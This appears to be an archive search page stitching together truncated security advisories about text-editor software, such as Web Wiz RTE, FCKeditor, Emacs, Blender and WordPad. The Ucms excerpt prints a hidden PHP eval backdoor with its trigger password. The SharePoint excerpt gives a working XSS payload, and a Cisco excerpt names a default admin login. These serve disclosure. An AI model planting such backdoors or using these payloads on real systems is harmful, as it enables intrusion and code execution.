text editing

Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02

-#########                                                                                  [Saved] - [27-07-2008/13:10:02]
#     .: Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02 
#     .: [Author]              CSDT
#     .: [Affected versions]   http://www.webwizguide.com/ - Web Wiz Rich Text Editor (RTE) 4.02
#     .: [Credit]              The disclosure of these issues has been credited to autehoker of CSDT 
# _____________________________________________________________________________________________
#     .: [Script Description] 
#    (Description Provided by CVE) : Multiple cross-site scripting (XSS) vulnerabilities in 
#    Web Wiz Rich Text Editor (RTE) 4.02 and earlier, and 3.x versions, allow remote attackers
#    to inject arbitrary web scripting. This flaw exists because the application does not validate 

Cisco Security Advisory: Default Passwords in the Application Velocity System

Changing the Management Console Username and Password
+----------------------------------------------------

Complete these steps:

 1. Open the following file in a text editor:

    $AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
    fgconsole.war/users.properties

    Use the line admin=admin to set the username and password. The

CORE-2009-0912: Blender .blend Project Arbitrary Command Execution

full control of the machine where Blender is installed sending a
specially crafted .blend file and enticing the user to open it.

These are the steps to reproduce the issue:

   . Open the "Text Editor" Panel.
   . Right click on the canvas and select "New".
   . Write your python code there. For instance:

/-----
      import os

Web Wiz Rich Text Editor Directory traversal + HTM/HTML file creation on the server

########################## WwW.BugReport.ir  
###########################################
#
#      AmnPardaz Security Research Team
#
# Title: Web Wiz Rich Text Editor(TM)
# Vendor: http://www.webwizguide.com/
# Bug: Directory traversal + HTM/HTML file creation on the server
# Vulnerable Version: 4.0
# Exploit: Available
# Fix Available: No! Fast Solution is available.

[ GLSA 200903-41 ] gedit: Untrusted search path

arbitrary code.

Background
==========

gedit is a text editor for the GNOME desktop.

Affected packages
=================

    -------------------------------------------------------------------

[oCERT-2009-007] FCKeditor input sanitization errors

#2009-007 FCKeditor input sanitization errors

Description:

FCKeditor, a web based open source HTML text editor, suffers from a remote
file upload vulnerability.

The input of several connector modules is not properly verified before being
used, this leads to exposure of the contents of arbitrary directories on the
server filesystem and allows file uploading to arbitrary locations. The

Ucms <= 1.8 Backdoor Remote Command Execution Exploit

Backdoor in file:
/php/modules/entries/search.cache.inc.php
line 8:
$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash . '_info.dat';
if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ'){@eval(@stripslashes($_POST['e']));exit;};
the second string is hidden at the very right side with whitespace in the text editor, so nobody had seen it before,
the function is called in:
/php/modules/entries/search.main.inc.php
exploit:
-->


CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities (Updated - v1.1)

How to determine if you are affected:

1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the 
   "C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is 
   vulnerable.


Workaround: None

[ GLSA 200710-22 ] TRAMP: Insecure temporary file creation

Background
==========

TRAMP is a remote file editing package for GNU Emacs, a highly
extensible and customizable text editor.

Affected packages
=================

    -------------------------------------------------------------------

VMSA-2009-0003 ESX 2.5.5 patch 12 updates service console package ed

3. Problem Description

 a. Updated ESX patch updates Service Console package ed

    ed is a line-oriented text editor, used to create, display, and
    modify text files (both interactively and via shell scripts).

    A heap-based buffer overflow was discovered in the way ed, the GNU
    line editor, processed long file names. An attacker could create a
    file with a specially-crafted name that could possibly execute an

XSS on Obedit v3.03

Application: Obedit
Version: 3.03
Vendor: http://www.oblius.com/?projects.obedit

Description:
obedit is a Flash-based rich text editor. It will allow a user to edit text much like you would in an office-like application, with simple editing features like bold, italic, justification, block indents, text color, font and size selection, links, bullets, background color, and spell checking.

--------------------
Vulns:
--------------------


[ GLSA 200712-03 ] GNU Emacs: Multiple vulnerabilities

execution of arbitrary code.

Background
==========

GNU Emacs is a highly extensible and customizable text editor.

Affected packages
=================

    -------------------------------------------------------------------

[ GLSA 200712-22 ] Opera: Multiple vulnerabilities

Description
===========

David Bloom reported two vulnerabilities where plug-ins (CVE-2007-6520)
and Rich text editing (CVE-2007-6522) could be used to allow cross
domain scripting. Alexander Klink (Cynops GmbH) discovered an issue
with TLS certificates (CVE-2007-6521). Gynvael Coldwind reported that
bitmaps might reveal random data from memory (CVE-2007-6524).

Impact

CAU-2008-0002: Microsoft Windows SharePoint Services Picture Source XSS

Technical Explanation
=====================

The string below is not properly sanitized when the web page is saved
after adding a picture using the application's text editor:

        """></P></div></td><script>alert("bingo");</script>

The text between the script tags will be injected into the page upon
each successful edit and save operation, after the page is initially

[ GLSA 201006-15 ] XEmacs: User-assisted execution of arbitrary code

user-assisted attackers to execute arbitrary code.

Background
==========

XEmacs is a highly extensible and customizable text editor.

Affected packages
=================

    -------------------------------------------------------------------

CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities

How to determine if you are affected:

1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the 
   "C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is 
   vulnerable.


Workaround: None

[Bkis-07-2009] 010 Editor Multiple Buffer Overflow Vulnerabilities

010 Editor Multiple Buffer Overflow Vulnerabilities

1. General Information

010 Editor is a text editor and hex editor with many functions, such as 
viewing and editing binary files, analyzing and editing binary data, and 
importing and exporting binary data in many different formats.

Bkis has just found many vulnerabilities in the software, related to the 
processing of 010 Editor Binary Template files (“.bt”) and 010 Editor 

iDefense Security Advisory 12.08.09: Microsoft WordPad Word97 Converter Integer Overflow Vulnerability

http://labs.idefense.com/intelligence/vulnerabilities/
Dec 08, 2009

I. BACKGROUND

WordPad is the default text editing application included with nearly all
Windows versions since Windows 95. The Word97 converter is used to
convert Word documents into the format used by WordPad, and is present
in all current versions of WordPad except Vista and Server 2008.

II. DESCRIPTION



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.